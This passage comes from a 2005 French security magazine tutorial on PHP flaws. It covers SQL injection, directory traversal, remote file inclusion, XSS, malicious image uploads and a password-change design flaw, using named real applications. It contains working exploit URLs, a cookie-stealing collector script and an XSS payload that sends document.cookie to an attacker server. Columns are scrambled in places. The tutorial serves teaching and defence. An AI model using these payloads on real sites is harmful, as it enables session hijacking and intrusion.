blème se manifestant en présence
de données d'entrée utilisateur non
contrôlées, à savoir la construction
de déclarations SQL. Un système
de création de comptes tel que le
suivant (supposons que le dernier
champ permet de savoir si l'utilisa-
teur est admin ou non) :
<?php
$query = "INSERT INTO users
VALUES ('$user', '$pass', 0)";
$result = mysql_query($query);
?>
peut être facilement exploité au
moyen d'une requête telle que http://
example.com/auth.php?user=HACK
ER&pass=HACK',1)#'
Cette dernière exécutera l'opéra-
tion INSERT INTO users VALUES ('HACK-
Listing 3. Exemple d'un fichier _global.php
$QW['requestPage'] = QWSafeGet( $QW_REQUEST, 'page' );
[...]
if ( !$QW['requestPage'] )
$QW['page'] = $QW_CONFIG['startPage'];
else
$QW['page'] = $QW['requestPage'];
[...]
$QW['pagePath'] = QWCreateDataPath( $QW['page'], '.qwiki' );
ER', 'HACK',1)#', 0). Autrement dit,
cette opération permet d'insérer dans
la base de données l'utilisateur appelé
HACKER, doté des privilèges de l'ad-
ministrateur tout en ignorant la suite
de la requête puisque cette partie est
considérée comme un commentaire
(en effet, le signe # indique le début
d'un commentaire dans MySQL). Il ne
fait donc aucun doute que le program-
meur ne peut avoir aucune confiance
dans tout ce qui provient de l'utilisa-
teur, puisque ce dernier peut avoir des
intentions malhonnêtes.
Possibilités de
sécurisation sous PHP
Il existe deux drapeaux capables de
modifier le comportement de PHP au
moment de traiter les variables d'en-
trée (en anglais input variables).
Le premier est connu sous le
nom de register _ globals. Lorsque
ce drapeau est désactivé (off), les
variables ne seront pas enregistrées
de manière automatique pour l'utili-
sation. Ainsi, le programmeur devra
indiquer l'emplacement à partir du-
quel la variable doit être prise. Dans
le premier script, donné en exemple,
si nous voulions éditer la valeur de
la variable var, nous aurions dû dire
à l'interpréteur PHP d'obtenir cette
dernière à partir des variables GET,
de manière à ce que le script se
transforme de la manière suivante :
<?php
echo $_GET['var'];
?>
De cette façon, les variables internes
ne seront pas polluées par les don-
nées d'entrée de l'utilisateur.
L'autre drapeau se nomme ma-
gic _ quotes _ gpc (voir également
l'article de Tobias Glemser inti-
tulé Attaques par injection SQL avec
PHP et MySQL), et exécute la fonc-
tion addslashes() sur l'ensemble des
données issues des variables GET,
POST et des cookies, en indiquant
toutes les valeurs problématiques au
moyen d'une barre oblique inverse.

hakin9 N o 3/2005 www.hakin9.org 23

 Dans l'exemple précédent, ce dra-
peau aurait permis d'éviter l'insertion
d'un utilisateur admin alors que la re-
quête SQL exécutée aurait été INSERT
INTO users VALUES ('HACKER', 'HACK\
',1)#\'', 0), ce qui permet d'insérer
un utilisateur dénommé HACKER,
dont le mot de passe est HACK',1#'
et doté de privilèges normaux.
Depuis PHP 4.2.0 le drapeau
register _ globals prend par défaut
la valeur OFF et le drapeau magic _
quotes _ gpc est activé. Donc, à partir
de maintenant, nous supposerons
que le serveur que nous activons pos-
sède ces valeurs pour les drapeaux
respectifs. Si ces derniers prennent
des valeurs différentes, nous n'aurons
pas accès au fichier de configuration
php.ini, mais nous pouvons changer
les drapeaux pour nos fichiers. Le
procédé est aussi simple que créer
un fichier .htaccess dans le répertoire
où se trouve les scripts PHP en y indi-
quant les lignes suivantes :
php_flag register_globals 0
php_flag magic_quotes_gpc 1
Les violations
de répertoires
Par violation de répertoire (en an-
glais directory traversal), on entend
la vulnérabilité qui permet à l'insti-
gateur d'une attaque d'accéder aux
fichiers non autorisés à partir du
serveur Web ou, selon la configu-
ration de PHP, d'inclure des fichiers
provenant d'un autre serveur.
Les fonctions vulnérables sont
celles qui traitent les fichiers tels que
include(), require(), fopen(), fi le(),
readfi le() etc. Si les données d'en-
trée de ces fonctions sont fournies
par l'utilisateur sans être effacées
correctement, il est alors possible
de remonter dans l'arborescence du
Bases
Listing 4. Extrait du script main.php du programme phpGiftReg
if (!empty($_GET["message"])) {
$message = $_GET["message"];
}
[...]
if (isset($message)) {
echo "<span class=\"message\">" . $message . "</span>";
} cherchons – il nous faut nous dé-
24
Figure 1. Fichier _config.php exploité
répertoire pour accéder à des fi-
chiers différents de ceux concernés
à l'origine par ces fonctions. Et c'est
aussi simple qu'ajouter ../ au para-
mètre que nous exploitons.
Analysons maintenant la façon
d'exploiter ce procédé dans une ap-
plication concrète, QwikiWiki. Ce lo-
giciel implémente un wiki, chargé de
sauvegarder des pages individuelles
dans différents fichiers. Ces fichiers
sont enregistrés dans un sous-réper-
toire appelé data situé à l'intérieur du
répertoire principal. Examinons
maintenant comment ces fichiers
sont inclus dans la page principale.
La fonction chargée de retourner le
corps (body) de la page est exposée
dans le Listing 2.
Comme vous pouvez le
constater, la fonction qui nous
intéresse s'appelle QWFormatQwi-
kiFile(). Cette fonction exige que
le chemin du fichier soit retourné.
Ainsi, nous savons d'ores et déjà
que $QW['pagePath'] est le véritable
chemin menant au fichier. Cette
fonction est définie dans le fichier
_ global.php (voir le Listing 3).
www.hakin9.org
Ici, la valeur du paramètre de
la page est affectée à la variable
$QW['requestPage']. En l'absence de
définition, la variable $QW['page'] est
affectée à une page de démarrage
par défaut (extraite de la configu-
ration) ou alors reçoit le paramètre
de la page. Finalement, la variable
$QW['pagePath'] est remplie au
moyen du véritable chemin du fichier
que nous souhaitons montrer, en ap-
pelant la fonction QWCreateDataPath(),
définie dans le fichier _wikiLib.php
de la manière suivante :
function QWCreateDataPath
( $page, $extension )
{
return 'data/'
. $page . $extension;
}
Cette opération se contente de
concaténer les paramètres de sorte
qu'avec une requête telle que http://
example.com/qwiki/index.php?page=
QwikiWiki, le programme tentera
d'ouvrir le fichier data/QwikiWiki.qwiki.
Il est clair que nous pourrions modifier
ce chemin pour lire des fichiers situés
dans d'autres répertoires.
La requête http://example.
com/qwiki/index.php?page=../_con-
fig.php appelera QWCreateDataPath
('../config.php','.wiki') qui retour-
nera data/../_config.php.qwiki. Ce
n'est pas exactement ce que nous
barrasser du chemin de la chaîne
hakin9 N o 3/2005

.qwiki. Nous allons donc profiter du
fait que sous PHP, les variables se
terminent par un caractère NULL.
Nous ajoutons un caractère NULL
à la fin du paramètre de la page, la
fonction QWCreateDataPath() n'ajou-
tera pas l'extension au chemin.
Le caractère NULL peut être
codé comme %00. Après son ajout
à la requête, celle-ci devient alors la
suivante : http://example.com/qwiki/
index.php?page=../_config.php%00.
Cette requête va alors tenter de lire
le fichier data/../_config.php conte-
nant le mot de passe illimité de l'ap-
plication (cf. la Figure 1).
Par défaut cette méthode est
censée ne pas fonctionner. Lorsque
le drapeau magic _ quotes _ gpc est
activé, PHP annule le caractère
NULL au moyen d'une barre oblique
inverse et le chemin du fichier devrait
être data/../_config.php\. Toutefois, le
programmeur avait ajouté les lignes
suivantes au fichier _global.php :
if( count( $QW_REQUEST ) )
foreach( $QW_REQUEST
as $name => $value )
$QW_REQUEST[ $name ]
= stripslashes( $value );
Ces lignes appellent tout simple-
ment la fonction stripslashes() pour
l'ensemble des paramètres de don-
nées d'entrée et effacent les barres
obliques inverses présentes dans
ces paramètres, ce qui nous permet
par conséquent de définir un fichier
à ouvrir.
Une autre vulnérabilité, sembla-
ble à celle-ci, est l'inclusion de fi -
chiers distants (en anglais remote file
inclusion), dans lesquels les données
d'entrée de la fonction include() ne
sont pas contrôlées. Nous pouvons
indiquer qu'un fichier distant, dont
nous avons le contrôle, soit inclus et
exécuté. Par conséquent, si la fonc-
tion prend l'apparence suivante :
include($_GET['language'] . ".php");
il est possible d'affecter la valeur http://
ourserver.com/crack au paramètre
du langage et le script tentera d'in-
clure le fichier http://ourserver.com/
hakin9 N o 3/2005
Bogues sous PHP
Figure 2. Effet dû au passage d'une valeur dans le paramètre
crack.php. Si nous contrôlons donc nous aborderons des techniques
ce fichier nous pourrons exécuter plus sophistiquées permettant d'ex-
tout ce que nous souhaitons dans le ploiter ces vulnérabilités.
serveur distant. D'abord, nous devrions considé-
rer le fichier du programme main.php
Scripts multi-sites (voir le Listing 4).
Les scripts multi-sites, également Si le paramètre du message n'est
connus sous le nom de XSS (pour pas laissé vide, sa valeur est copiée
Cross Site Scripting en anglais), vers la variable $message, envoyée
permettent l'inclusion de code HTML ultérieurement à l'utilisateur. Ainsi,
arbitraire (et par conséquent de Ja- toutes valeurs passées dans cette
vascript ou autres scripts côté client) variable seront affichées sur la page.
dans un site en ayant recours aux Nous pouvons tenter d'afficher du
hyperliens codés. Ceci se manifeste texte en affectant une valeur au para-
lorsque le script génère en sortie mètre de la manière suivante : http://
certains de ses paramètres à l'utili- example.com/phpgiftreg/index.php?
sateur sans les filtrer. message=YOUR SITE HAS BEEN
Considérons un court exemple HACKED.
avec phpGiftReg, programme de En effet, notre texte est bien re-
registres de cadeaux, grâce auquel tourné dans la page (voir la Figure 2).
Listing 5. Application phpEventCalendar – extrait du script
functions.php
function getEventDataArray($month, $year)
{ [...]
if (strlen($row["title"]) > TITLE_CHAR_LIMIT)
$eventdata[$row["d"]]["title"][] =
substr(stripslashes($row["title"]), 0, TITLE_CHAR_LIMIT) . "...";
[...]
Listing 6. Script du fichier get_cookie.php
<?php
$f = fopen("cookies.txt","a");
$ip = $_SERVER["REMOTE_ADDR"];
$c = $_GET['cookie'];
fwrite($f, $ip." ".$c."\n");
fclose($f);
?>
www.hakin9.org 25

Figure 3. Exécution d'une
application JavaScript (Injections
HTML)
Si nous envoyons ce lien à quel-
qu'un, il est fort probable que cette
personne pense que la page a réelle-
ment été attaquée et modifiée. Tou-
tefois, le texte est clairement visible
dans la requête elle-même. Nous
allons donc tenter de le dissimuler,
en codant le paramètre au moyen
de la représentation hexadécimale
de chaque caractère de la ma-
nière suivante : http://example.com/
phpgiftreg/index.php?message=%
59%4F%55%52%20%53%49%54
%45%20%48%41%53%20%42%4
5%45%4E%20%48%41%43%4B%
45%44. Cette nouvelle requête est
de loin moins soupçonneuse que la
requête précédente. De la même fa-
çon que nous avons inclus du texte,
nous aurions très bien pu insérer du
code JavaScript arbitraire, exécuté
dans le serveur de l'utilisateur qui
ouvrira le lien.
Injections
de code HTML
Ce genre de vulnérabilité est très
semblable aux scripts multi-sites,
mais est potentiellement plus dange-
reux puisque la personne, à l'origine
de l'attaque, n'a pas besoin d'envoyer
Bases
de lien pour exploiter cette faille. Ce
genre d'attaques peut être utilisé avec
un logiciel chargé de sauvegarder les
données d'entrée de l'utilisateur (soit
dans une base de données, soit dans
des fichiers) et de les afficher plus tard
à d'autres utilisateurs non filtrés. Il est
possible de trouver facilement ce type
26
de bogues dans de nombreux forums
en ligne et autres applications qui per-
mettent de partager des informations
entre plusieurs utilisateurs.
Il est relativement aisé de savoir
si une application est vulnérable ou
pas, même sans prendre connais-
sance du code source. Cherchez un
quelconque emplacement où vous
pouvez insérer des informations que
le système enregistrera et affichera
ultérieurement (par exemple, nous
pourrions tenter l'expérience sur les
messages que nous écrivons, mais
également sur le nom de l'utilisateur
ou la description de notre utilisateur)
et y écrire le code suivant : <script>
alert(document.cookie);</script>. Si
une boîte de message affiche notre
cookie à l'ouverture de la page, l'ap-
plication peut alors être considérée
comme vulnérable.
Maintenant que nous avons ap-
pris à reconnaître cette vulnérabilité,
nous allons tenter de la faire fonction-
ner dans une application concrète
appelée, phpEventCalendar, dont le
but est de permettre aux utilisateurs
de partager un agenda électronique.
Nous ouvrons une session par le biais
d'un utilisateur non-privilégié pour in-
sérer dans l'agenda électronique un
nouvel événement. Ce nouvel évé-
nement peut prendre n'importe quel
titre de notre choix, quant au texte
de l'événement, il devrait prendre la
forme suivante : <script>alert(docum
ent.cookie);</script>. Une fois l'évé-
nement inséré et au moment où nous
tentons de l'afficher, un message
surgit contenant notre cookie actuel
pour la page. Il aurait été parfait
d'insérer cet élément dans le titre de
l'événement, puisqu'il n'aurait plus été
nécessaire de voir l'événement exé-
cuter notre code. Toutefois, si nous
tentons cette nouvelle approche, rien
Listing 7. Code présent dans le fichier index.php de l'application
phpGiftReg
$action = $_GET["action"];
if ($action == "ack") {
$query = "UPDATE messages SET isread = 1
WHERE messageid = " . $_GET["messageid"];
mysql_query($query) or die("Could not query: ".mysql_error());
}
www.hakin9.org
ne fonctionne. En effet, il semble y
avoir une limite dans la longueur du
titre affiché. Si nous considérons les
éléments enregistrés dans la base de
données, il est effectivement possible
de voir le titre complet, mais, dans le
fichier functions.php de cette applica-
tion, nous pouvons trouver le code
suivant dont voici exposé un extrait
dans le Listing 5.
Cette fonction a pour objectif de
limiter la longueur du titre aux ca-
ractères suivants TITLE_CHAR_LI-
MIT, et, par défaut, cette longueur
est définie à 37 caractères dans le
fichier config.php. Par conséquent,
à moins que l'administrateur n'ait
changé la configuration, le texte que
nous insérons sera limité à 37 carac-
tères, ce qui est insuffisant pour ce
que nous souhaitons faire. Il nous
faut, donc, avoir recours au texte de
l'événement.
Afin d'obtenir le cookie admi-
nistrateur, il nous faut procéder de
la même façon qu'avec le piège
de l'alerte. Toutefois, au lieu de le
montrer à l'utilisateur, nous nous
l'enverrons. Pour ce faire, il nous
faut contrôler un serveur dans le-
quel nous pouvons exécuter des
fichiers PHP et où nous sauvegar-
derons le cookie. Nous créerons
dans ce serveur un fichier nommé
get_cookie.php dont le contenu est
exposé dans le Listing 6.
Ce script ouvre normalement le
fichier intitulé cookies.txt et y copie
l'adresse distante du demandeur de
la requête (soit son IP) ainsi que la
valeur du paramètre du dit cookie.
Puis, nous créons un nouvel événe-
ment, dont, cette fois, le texte sera
le suivant :
<script>document.location=§
"http://[OURSERVER]/get_
hakin9 N o 3/2005
 Bogues sous PHP

trateur et modifier tout ce que nous

souhaitons (voir la Figure 3).

Injections SQL
On peut rencontrer une certaine
vulnérabilité aux injections SQL (voir
à ce sujet l'article de Tobias Glemser
intitulé Attaques par injections SQL
avec PHP et MySQL dans la pré-
sente édition du magazine hakin9)
Figure 4. Fichier invalide téléchargé vers le serveur de Coppermine lorsqu'un utilisateur a la possibilité
de modifier une requête SQL exécu-
tée à son avantage. À titre de court
exemple, nous observons une fois de
plus l'application phpGiftReg. Le co-
de présent dans le fichier index.php
est exposé dans le Listing 7.
Ces lignes ont pour objectif
d'exécuter l'instruction SQL si le pa-
ramètre de l'action est égal à ack, re-
Figure 5. Attaque réussie d'un fichier envoyé vers le serveur connaissant ainsi le message indiqué
dans un paramètre appelé messageid.
Il est possible de contrôler le para-
Listing 8. Script du fichier useradmin.php mètre messageid, et rien n'est plus
switch( $flag ) {
simple. En effet, il suffit de modifier
case "changepw": une requête afin de régler le champ
changePW($flag); isread pour toutes les rangées de la
break; façon suivante : http://example.com/
case "updatepw":
phpgiftreg/index.php?action=ack&m
updatePassword();
changePW($flag);
essageid=2%20OR%201%3d1. Une
break; fois réglé, ce paramètre exécutera la
[...] requête UPDATE messages SET isread
function updatePassword() = 1 WHERE messageid = 2 OR 1=1, en
{
réglant de manière effective isread
global $HTTP_POST_VARS, $HTTP_SESSION_VARS;
$pw = $HTTP_POST_VARS['pw'];
à 1 dans l'ensemble des registres,
$id = $HTTP_POST_VARS['id']; puisque la clause WHERE sera vraie
[...] pour l'ensemble des enregistrements
$sql = "UPDATE " . DB_TABLE_PREFIX . (en effet, 1=1 est toujours vraie).
"users SET password='$pw' WHERE uid='$id'";
$result = mysql_query($sql) or die(mysql_error());
$HTTP_SESSION_VARS['authdata']['password'] = $pw; Téléchargement
}
de fichiers PHP vers
le serveur
cookie.php?§ vers notre script tout en passant la PHP permet de télécharger des
cookie=" + document.cookie;</script> valeur actuelle de son cookie. Nous fichiers vers le serveur. Ce procédé
obtiendrons ainsi le cookie qui nous est en général utilisé dans le but d'in-
Lorsque l'administrateur ouvre cet intéresse dans le fichier cookies.txt. sérer une image n'importe où dans le
événement, notre script injecté sera Il est alors possible d'utiliser ce coo- site ou de partager des fichiers entre
alors exécuté, redirigeant l'utilisateur kie pour ouvrir une session adminis- différents utilisateurs. Toutefois, que
se passerait-il si nous téléchargions
une autre sorte de fichier sous forme
Sur le réseau : de scripts PHP ? Nous aurions la
• http://www.qwikiwiki.com/ – le projet QwikiWiki, possibilité d'exécuter un code arbi-
• http://phpgiftreg.sourceforge.net/ – l'application phpGiftRegistry, traire dans le serveur, nous permet-
• http://www.ikemcg.com/scripts/pec/ – l'application PHP Event Calendar, tant ainsi de contrôler ce dernier.
• http://coppermine.sourceforge.net/ – la galerie d'images Coppermine. Lorsqu'un fichier est téléchargé
vers le serveur, il est possible de

hakin9 N o 3/2005 www.hakin9.org 27

 trouver des informations concernant
ce dernier dans le tableau $ _ FILES
ou $HTTP _ POST _ FILES. Nous pou-
vons ainsi trouver l'emplacement,
dans le code, où est effectué le trai-
tement en cherchant ces variables.
Nous allons appliquer cette méthode
sur l'ancienne version de Copper-
mine, galerie d'images Web. Si nous
téléchargeons le fichier .php vers le
serveur, celui-ci répond que le fichier
téléchargé n'est pas une image
valide. Il semble donc que nous de-
vions pousser un peu plus loin cette
méthode (voir la Figure 4).
Il suffit d'exécuter la commande
suivante dans le répertoire où se
trouvent les fichiers .php et nous
saurons par où commencer :
$ rgrep "_FILES" *
Nous pouvons alors voir le seul
fichier chargé de traiter les téléchar-
gements vers le serveur. Il s'agit du
fichier intitulé db_input.php. Regar-
dons donc d'un peu plus près :
case 'picture':
$imginfo = $HTTP_POST_FILES
['userpicture']['tmp_name'] ?
@getimagesize($HTTP_POST_FILES
['userpicture']['tmp_name'] : null;
Ces indications affectent les proprié-
tés de l'image téléchargée vers le
serveur, s'il y en a, vers la variable
$imginfo, de telle sorte que le fichier
téléchargé doive retourner les valeurs
correctes pour la fonction getimagesi-
ze(). Ces indications nous suffisent :
il nous faut créer un fichier PNG 1x1
pixels appelé image.png ainsi qu'un
fichier PHP intitulé code.php conte-
nant le code que nous souhaitons
exécuter. Puis, il faut concaténer les
deux fichiers au moyen des instruc-
tions suivantes, chargées de créer un
fichier intitulé crack_up.php :
Bases
$ cat image.png code.php \
> crack_up.php
Envoyez ensuite le fichier crack_
up.php à partir de l'interface standard
Coppermine. L'image est alors ajoutée
à la galerie et notre fichier peut être
28
situé à l'adresse suivante : http://
example.com/coppermine/albums/
userpics/crack_up.php, où nous
pouvons l'exécuter comme n'importe
quel autre script PHP (voir la Figure 5).
Il est probable que vous deviez re-
garder la source du script retourné si
aucun contenu ne s'affiche, puisque
le PNG se trouvera au début et peut
être à l'origine de défauts d'affichage
du contenu.
Erreurs de conception
Le dernier type de vulnérabilités que
nous allons évoquer est l'erreur de
conception. Si le développeur d'un
logiciel que nous tentons d'exploiter
y a travaillé sans penser à le sécu-
riser, il est fort possible que certains
éléments ont été mal conçus. C'est
à partir de ces éléments que nous
pouvons tenter de tirer avantage pour
notre propre compte. Malheureuse-
ment, ce genre de vulnérabilités sont
difficiles à repérer puisqu'il nous faut
connaître le fonctionnement interne
de l'application et revoir une grande
partie du code afin de trouver une
erreur de cette sorte. Par ailleurs,
chaque erreur de conception est dif-
férente dans la mesure où chacune
est spécifique à chaque application
et à chaque développeur.
Observons comment trouver une
erreur de conception dans l'appli-
cation phpEventCalendar, où nous
avions précédemment trouvé une
vulnérabilité aux injections HTML.
Supposons que nous soyons de
simples utilisateurs et que nous
souhaitions devenir administrateurs,
soit en trouvant le mot de passe de
l'administrateur, soit en changeant
ce dernier en valeur arbitraire.
Une fois la session ouverte,
l'unique option associée au mot
de passe consiste à le changer.
Ainsi, il nous faut observer le fichier
chargé de cette procédure, et intitulé
useradmin.php (voir le Listing 8).
Notre application a recours à la
valeur id passé en paramètre afin de
modifier le mot de passe au lieu d'uti-
liser celui qu'il possède déjà dans la
variable de la session. Nous pouvons
donc affecter n'importe quelle valeur
à l'id et, par conséquent, modifier
www.hakin9.org
le mot de passe de tout utilisateur
si nous connaissons son id dans la
base de données.
Comme l'administrateur est
généralement le premier utilisateur
créé, son id sera 1. Essayons donc
de modifier son mot de passe. Tout
d'abord, nous allons demander http://
example.com/pec/useradmin.php?fla
g=changepw puis sauvegarder cette
requête sur le disque dur. Nous allons
l'éditer pour chercher l'élément suivant
(votre valeur peut être différente) :
<input type="hidden" §
name="id" value="2">
Nous allons le substituer avec :
<input type="hidden" §
name="id" value="1">
et changer également f.action =
"useradmin.php?fl ag=updatepw"; pour
la direction correcte du fichier (par
exemple http://example.com/pec/us
eradmin.php?flag=updatepw). Lors-
que nous téléchargeons ce fichier
dans le navigateur, il est possible de
changer et d'affecter la valeur que
nous souhaitons au mot de passe de
l'administrateur.
Ne croyez personne
Nous venons d'aborder les différentes
manières d'exploiter un script PHP
(parmi ces manières, nombreuses
sont également applicables aux
scripts écrits dans d'autres langues).
En conclusion, nous ne devons faire
confiance en aucune donnée d'entrée
émanant d'emplacements que nous
ne contrôlons pas, et plus particulière-
ment venant des utilisateurs. Les don-
nées d'entrée doivent faire l'objet d'un
contrôle ainsi que d'une validation mi-
nutieuse avant d'être utilisées. Il existe
de nombreuses façons de contrôler
les données d'entrée pour les valider
et il est toujours plus pertinent de re-
mettre en cause une donnée d'entrée
correcte que d'autoriser l'accès à une
donnée d'entrée incorrecte. Par con-
séquent, le recours à une politique de
liste blanche plutôt qu'à une politique
de liste noire est une solution des plus
judicieuse. n
hakin9 N o 3/2005
 Attaques par injection SQL
avec PHP et MySQL
Tobias Glemser
U
n grand nombre de sites Web font ap-
pel à PHP allié à une base de données
MySQL. La plupart des systèmes de fo-
rum (en anglais bulletin board systems) tels que
phpBB ou VBB, se fonde sur cette combinaison
de technologies, pour ne nommer que les plus
populaires. Il en va de même pour les systèmes
CMS (soit Content Management System, en
anglais) tels que PHP-Nuke ou des solutions
d'achats électroniques comme osCommerce.
Pour être bref – il existe de nombreuses
implémentations convenables pour la combinai-
son PHP/MySQL auxquelles tout un chacun est
souvent confronté en surfant sur le Web. Cette
combinaison de technologies est tellement uti-
lisée que les taux d'attaques de ces sytèmes
sont en constante hausse et les injections SQL
comptent parmi les techniques les plus utilisées
Attaque
pour mener de telles attaques. Afin d'être capa-
ble de protéger votre système, il est vraiment im-
portant de bien comprendre le fonctionnement
des injections SQL.
Dans le vif du sujet
Commençons par un script légèrement in-
certain que nous avons appelé login.php
et exposé dans le Listing 1 (réduit à l'essentiel,
30 www.hakin9.org
Il existe un certain nombre de
techniques communes dont
l'objectif est d'attaquer les
environnements PHP/MySQL.
Les injections SQL font partie
des techniques d'attaques
parmi les plus utilisées. Cette
technique consiste à altérer
l'état de l'application qui subit
l'attaque de manière à accepter
nos données d'entrée capables
de manipuler les requêtes SQL.
Les injections SQL doivent par
conséquent être considérées
comme un membre de la famille
des attaques par validation des
données d'entrée (en anglais
input validation).
la version complète est présente sur hakin9.live).
Ce script fait appel à une seule base de données
sous MySQL appelée userdb dotée d'une seule
table appelée userlist. Cette table userlist stocke
les données en deux rangées : username (nom
de l'utilisateur) et password (mot de passe).
Si aucun nom d'utilisateur n'est entré, le
script affiche alors une page d'ouverture de
session. Une fois que les utilisateurs valides
ouvrent leur session, ils pourront voir leur nom
d'utilisateur ainsi que leur mots de passe. Si cette
Cet article explique...
• les techniques de base relatives aux injections
SQL,
• les attaques par UNION SELECT,
• les magic_quotes et leurs usages.
Ce qu’il faut savoir...
• vous devriez connaître au moins le fonctionne-
ment de base du langage PHP,
• vous devriez être capable de comprendre le
fonctionnement élémentaire des requêtes
MySQL.
hakin9 N o 3/2005

Tableau 1. Caractères de contrôle importants pour les injections SQL (MySQL)
Caractère de contrôle
' (guillemet simple)
/*
% Caractère de remplacement (Wild-
OR 1=1
OR 1=’1
OR 1=”1
combinaison nom d'utilisateur/mot de
passe n'est pas valide, un message
Not a valid user (le nom de l'utilisateur
et le mot de passe ne sont pas vali-
des) sera affiché. Nous allons tenter
maintenant d'effectuer une ouverture
de session au moyen d'un nom d'utili-
sateur valide sans toutefois connaître
le mot de passe correspondant. Pour
y parvenir, nous allons mettre au point
une attaque par injection SQL.
L'attaque démarre sur un carac-
tère de contrôle (en anglais control
character) de MySQL. Les caractères
de contrôle les plus importants sont
exposés dans le Tableau 1. Nous al-
lons tenter d'intercepter la déclaration
originale SQL du script au moyen de
caractères de contrôle, en les manipu-
lant. Nous pouvons débuter l'attaque
sur cette base (mais afin de corser
l'affaire, je vous encourage à ne pas
consulter tout de suite le code source
exposé dans le Listing 1).
Nous supposerons que l'utilisa-
teur admin existe (c'est d'ailleurs
souvent le cas). Si nous entrons
le nom d'utilisateur admin, nous ne
pourrons pas ouvrir de session.
Examinons alors ce qui se passe si
nous manipulons la chaîne soumise
à la requête SQL en ajoutant à cette
À propos de l'auteur
Tobias Glemser travaille comme con-
sultant spécialisé dans la sécurité des
technologies de l'information depuis
quatre ans. Il est actuellement employé
au sein de la société Tele-Consulting
GmbH, Allemagne (http://www.tele-
consulting.com).
hakin9 N o 3/2005
Attaques par injections SQL
Signification pour l'injection
Si le serveur répond par une erreur
SQL, l'application devient vulnéra-
ble aux injections SQL
Tout ce qui suit est considéré
comme commentaire extérieur
card)
Oblige une déclaration à devenir
vraie
dernière un guillemet simple à la
suite du nom de l'utilisateur dans
notre script. Le script va émettre
alors le message d'erreur suivant :
You have an error in your SQL
syntax. Check the manual that
corresponds to your MySQL server
version for the right syntax to use
near ''admin'' AND `password` = '''
at line 1 (Une erreur de syntaxe SQL
s'est produite dans le script. Veuillez
consulter le manuel correspondant
à la version de votre serveur MySQL
pour utiliser la syntaxe appropriée
après ''admin'' ET `password` = '''
sur la ligne 1). Nous avons ici sous
les yeux une partie de la syntaxe
SQL que nous souhaitons attaquer.
Et nous savons de surcroît que cette
Figure 1. Injection SQL la plus petite possible pour cette forme
Figure 2. Résultat d'une injection
www.hakin9.org
syntaxe est vulnérable, puisque, si
tel n'était pas le cas, le script n'aurait
généré aucun message d'erreur.
L'étape suivante consiste à rendre
la déclaration SQL vraie, de sorte
qu'elle soit traitée par le script puis
soumise au serveur SQL. Comme
vous pouvez le constater dans le
Tableau 1, la déclaration suivie de
OR 1=1 est toujours vraie. Entrons donc
notre nom d'utilisateur suivi de l'ex-
pression OR 1=1, de manière à obtenir
la chaîne admin ‘ OR 1=1. Malheureu-
sement, cette chaîne génère à son
tour un message d'erreur. Essayons
donc la proposition suivante exposée
dans la table. Nous changerons OR 1=1
en OR 1=’1 et voilà que nous pouvons
ouvrir la session. Le script est telle-
ment gentil qu'il nous retourne le vrai
mot de passe de l'utilisateur.
Si vous observez maintenant le
code source exposé dans le Listing 1,
vous devriez comprendre d'ores et dé-
jà les raisons d'un tel comportement.
L'instruction d'origine select SELECT *
FROM `userlist` WHERE `username` =
'$username' AND `password` = '$pas-
sword' a été modifiée en SELECT * FROM
`userlist` WHERE `username` = 'admin
' OR 1='1' AND `password` = '', ce qui
la rend vraie. Nous aurions également
pu indiquer comme commentaires
extérieurs la partie du script suivant
31

Listing 1. Script login.php
<?php
if (!empty($username)) {
/* (...) */
$query = "SELECT * FROM `userlist` WHERE `username` = '$username'
AND `password` = '$password'";
$result = mysql_query($query, $link);
/* (...) */
while ($array = mysql_fetch_array($result)) {
$logged_in = 'yes';
$username = $array[username];
$password = $array[password];
}
if ($logged_in == ‘yes’) {
echo "hello $username, your password is $password<br />";
} else {
echo "not a valid user<br />";
}
/* (...) */
} else {
echo "Login<br>
<form name=\"login\" method=\"post\" action=\"\">
<p>Username<br /><input type=\"text\" name=\"username\" size=30><br />
<p>Password<br /><input type=\"password\" name=\"password\" size=30>
</p><input type=\"submit\" value=\"Login\"></form>";
}
?>
le contrôle du nom de l'utilisateur en
insérant la chaîne admin' /*, procédé
plus simple (exposé dans la Figure 1,
le résultat est visible dans la Figure 2).
L'instruction, une fois manipulée,
ressemblerait à ceci : SELECT * FROM
`userlist` WHERE `username` = 'ad-
min ' /* OR 1='1' AND `password` = ''.
N'oubliez pas : tout ce qui suit /* est
ignoré du serveur SQL, faisant de ce
caractère de contrôle un élément très
puissant.
Attaques
UNION SELECT
Après cette brève introduction aux
techniques de base des injections
SQL, nous pouvons maintenant
aborder les injections du type UNION.
Les attaques à double instruction
UNION SELECT sont sans nul doute
considérées comme les plus com-
Attaque
pliquées et complexes variations
d'attaques par injection SQL.
Jusqu'à présent, nous avons
modifié les instructions existantes en
réduisant ou désactivant la requête
originale. Grâce à l'instruction UNION
SELECT, nous sommes capables
d'accéder à d'autres tables pour
exécuter nos propres requêtes dans
32
– y compris la version utilisée – sont
toujours disponibles sur le site de
Sourceforge (voir l'adresse du site
dans l'Encadré Sur le réseau). Nous
allons utiliser la version 1.5.4, connue
pour être peu sûre.
Il existe une attaque connue sur
cette version du forum (voir le site
http://www.securityfocus.com/bid/
9449/, l'exploit revenant à quelqu'un
se faisant appelé backspace). Cette
méthode d'attaque modifie la requête
à la ligne 222 du script SSI.php (voir
le Listing 2) et est associée à la fonc-
tion recentTopics().
Où pouvons-nous interagir dans
cette instruction ? La variable $ID _
MEMBER constitue un bon point de dé-
part. Notre premier objectif consiste à
forcer l'instruction ainsi qu'à vérifier si
le serveur retourne un message d'er-
reur. Afin d'y parvenir, il suffit de pla-
cer un caractère de contrôle à la fin de
la variable. Dirigeons donc notre navi-
gateur vers SSI.php?function=recent
Topics&ID_MEMBER=1’. Le serveur
l'application. Toutefois, il est très dif- réagit en affichant le message Unk-
ficile d'obtenir une instruction UNION nown table 'lmr' in field list (Table 'lmr'
SELECT correcte et opérationnelle inconnue dans la liste des champs).
sans connaître au préalable le code Comme vous pouvez le constater,
source, car il faut connaître le nom il existe une référence à une table lmr
des tables et des rangées. qui n'est pas référencée dans le reste
Il est évident que de telles tech- de l'instruction interceptée.
niques sont plus faciles d'utilisation L'étape suivante devrait con-
lorsque le code source de l'application sister à modifier l'instruction afin
est disponible. Considérons, par con- de reconstruire la référence. Afin
séquent, une telle situation en faisant de trouver une instruction valide, il
appel au système de forum existant faudrait examiner le listing original,
– soit YaBB SE Message Board (dis- à l'emplacement précis où la table
ponible sur hakin9.live), un dérivé de lmr est appelée. Nous trouverons la
YaBB écrit en Perl. YaBB SE n'est plus solution dans l'instruction LEFT JOIN
